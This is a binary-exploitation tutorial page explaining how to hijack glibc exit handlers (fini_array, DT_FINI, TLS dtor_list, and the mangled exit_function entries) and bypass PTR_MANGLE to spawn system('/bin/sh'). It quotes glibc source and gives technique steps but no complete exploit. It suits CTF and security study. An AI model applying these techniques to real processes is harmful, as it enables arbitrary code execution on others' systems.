Skip to content

WWW2Exec - atexit(), TLS Storage & Other mangled Pointers

[AD REMOVED]

__atexit Structures

[!CAUTION] Nowadays is very weird to exploit this!

atexit() is a function to which other functions are passed as parameters. These functions will be executed when executing an exit() or the return of the main.\ If you can modify the address of any of these functions to point to a shellcode for example, you will gain control of the process, but this is currently more complicated.\ Currently the addresses to the functions to be executed are hidden behind several structures and finally the address to which it points are not the addresses of the functions, but are encrypted with XOR and displacements with a random key. So currently this attack vector is not very useful at least on x86 and x64_86.\ The encryption function is PTR_MANGLE. Other architectures such as m68k, mips32, mips64, aarch64, arm, hppa... do not implement the encryption function because it returns the same as it received as input. So these architectures would be attackable by this vector.

You can find an in depth explanation on how this works in https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html

As explained in this post, If the program exits using return or exit() it'll run __run_exit_handlers() which will call registered destructors.

[!CAUTION] If the program exits via _exit() function, it'll call the exit syscall and the exit handlers will not be executed. So, to confirm __run_exit_handlers() is executed you can set a breakpoint on it.

The important code is (source):

ElfW(Dyn) *fini_array = map->l_info[DT_FINI_ARRAY];
if (fini_array != NULL)
  {
    ElfW(Addr) *array = (ElfW(Addr) *) (map->l_addr + fini_array->d_un.d_ptr);
    size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr)));

    while (sz-- > 0)
      ((fini_t) array[sz]) ();
  }
  [...]




// This is the d_un structure
ptype l->l_info[DT_FINI_ARRAY]->d_un
type = union {
    Elf64_Xword d_val;  // address of function that will be called, we put our onegadget here
    Elf64_Addr d_ptr;   // offset from l->l_addr of our structure
}

Note how map -> l_addr + fini_array -> d_un.d_ptr is used to calculate the position of the array of functions to call.

There are a couple of options:

  • Overwrite the value of map->l_addr to make it point to a fake fini_array with instructions to execute arbitrary code
  • Overwrite l_info[DT_FINI_ARRAY] and l_info[DT_FINI_ARRAYSZ] entries (which are more or less consecutive in memory) , to make them points to a forged Elf64_Dyn structure that will make again array points to a memory zone the attacker controlled.
  • This writeup overwrites l_info[DT_FINI_ARRAY] with the address of a controlled memory in .bss containing a fake fini_array. This fake array contains first a one gadget address which will be executed and then the difference between in the address of this fake array and the value of map->l_addr so *array will point to the fake array.
  • According to main post of this technique and this writeup ld.so leave a pointer on the stack that points to the binary link_map in ld.so. With an arbitrary write it's possible to overwrite it and make it point to a fake fini_array controlled by the attacker with the address to a one gadget for example.

Following the previous code you can find another interesting section with the code:

/* Next try the old-style destructor.  */
ElfW(Dyn) *fini = map->l_info[DT_FINI];
if (fini != NULL)
  DL_CALL_DT_FINI (map, ((void *) map->l_addr + fini->d_un.d_ptr));
}

In this case it would be possible to overwrite the value of map->l_info[DT_FINI] pointing to a forged ElfW(Dyn) structure. Find more information here.

TLS-Storage dtor_list overwrite in __run_exit_handlers

As explained here, if a program exits via return or exit(), it'll execute __run_exit_handlers() which will call any destructors function registered.

Code from _run_exit_handlers():

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
                     bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

Code from __call_tls_dtors():

typedef void (*dtor_func) (void *);
struct dtor_list //struct added
{
  dtor_func func;
  void *obj;
  struct link_map *map;
  struct dtor_list *next;
};

[...]
/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)     // parse the dtor_list chained structures
    {
      struct dtor_list *cur = tls_dtor_list;        // cur point to tls-storage dtor_list
      dtor_func func = cur->func;
      PTR_DEMANGLE (func);                      // demangle the function ptr

      tls_dtor_list = tls_dtor_list->next;      // next dtor_list structure
      func (cur->obj);
      [...]
    }
}

For each registered function in tls_dtor_list, it'll demangle the pointer from cur->func and call it with the argument cur->obj.

Using the tls function from this fork of GEF, it's possible to see that actually the dtor_list is very close to the stack canary and PTR_MANGLE cookie. So, with an overflow on it's it would be possible to overwrite the cookie and the stack canary.\ Overwriting the PTR_MANGLE cookie, it would be possible to bypass the PTR_DEMANLE function by setting it to 0x00, will mean that the xor used to get the real address is just the address configured. Then, by writing on the dtor_list it's possible chain several functions with the function address and it's argument.

Finally notice that the stored pointer is not only going to be xored with the cookie but also rotated 17 bits:

0x00007fc390444dd4 <+36>:   mov    rax,QWORD PTR [rbx]      --> mangled ptr
0x00007fc390444dd7 <+39>:   ror    rax,0x11             --> rotate of 17 bits
0x00007fc390444ddb <+43>:   xor    rax,QWORD PTR fs:0x30    --> xor with PTR_MANGLE

So you need to take this into account before adding a new address.

Find an example in the original post.

Other mangled pointers in __run_exit_handlers

This technique is explained here and depends again on the program exiting calling return or exit() so __run_exit_handlers() is called.

Let's check more code of this function:

  while (true)
    {
      struct exit_function_list *cur;

    restart:
      cur = *listp;

      if (cur == NULL)
    {
      /* Exit processing complete.  We will not allow any more
         atexit/on_exit registrations.  */
      __exit_funcs_done = true;
      break;
    }

      while (cur->idx > 0)
    {
      struct exit_function *const f = &cur->fns[--cur->idx];
      const uint64_t new_exitfn_called = __new_exitfn_called;

      switch (f->flavor)
        {
          void (*atfct) (void);
          void (*onfct) (int status, void *arg);
          void (*cxafct) (void *arg, int status);
          void *arg;

        case ef_free:
        case ef_us:
          break;
        case ef_on:
          onfct = f->func.on.fn;
          arg = f->func.on.arg;
          PTR_DEMANGLE (onfct);

          /* Unlock the list while we call a foreign function.  */
          __libc_lock_unlock (__exit_funcs_lock);
          onfct (status, arg);
          __libc_lock_lock (__exit_funcs_lock);
          break;
        case ef_at:
          atfct = f->func.at;
          PTR_DEMANGLE (atfct);

          /* Unlock the list while we call a foreign function.  */
          __libc_lock_unlock (__exit_funcs_lock);
          atfct ();
          __libc_lock_lock (__exit_funcs_lock);
          break;
        case ef_cxa:
          /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
         we must mark this function as ef_free.  */
          f->flavor = ef_free;
          cxafct = f->func.cxa.fn;
          arg = f->func.cxa.arg;
          PTR_DEMANGLE (cxafct);

          /* Unlock the list while we call a foreign function.  */
          __libc_lock_unlock (__exit_funcs_lock);
          cxafct (arg, status);
          __libc_lock_lock (__exit_funcs_lock);
          break;
        }

      if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
        /* The last exit function, or another thread, has registered
           more exit functions.  Start the loop over.  */
        goto restart;
    }

      *listp = cur->next;
      if (*listp != NULL)
    /* Don't free the last element in the chain, this is the statically
       allocate element.  */
    free (cur);
    }

  __libc_lock_unlock (__exit_funcs_lock);

The variable f points to the initial structure and depending on the value of f->flavor different functions will be called.\ Depending on the value, the address of the function to call will be in a different place, but it'll always be demangled.

Moreover, in the options ef_on and ef_cxa it's also possible to control an argument.

It's possible to check the initial structure in a debugging session with GEF running gef> p initial.

To abuse this you need either to leak or erase the PTR_MANGLEcookie and then overwrite a cxa entry in initial with system('/bin/sh').\ You can find an example of this in the original blog post about the technique.

[AD REMOVED]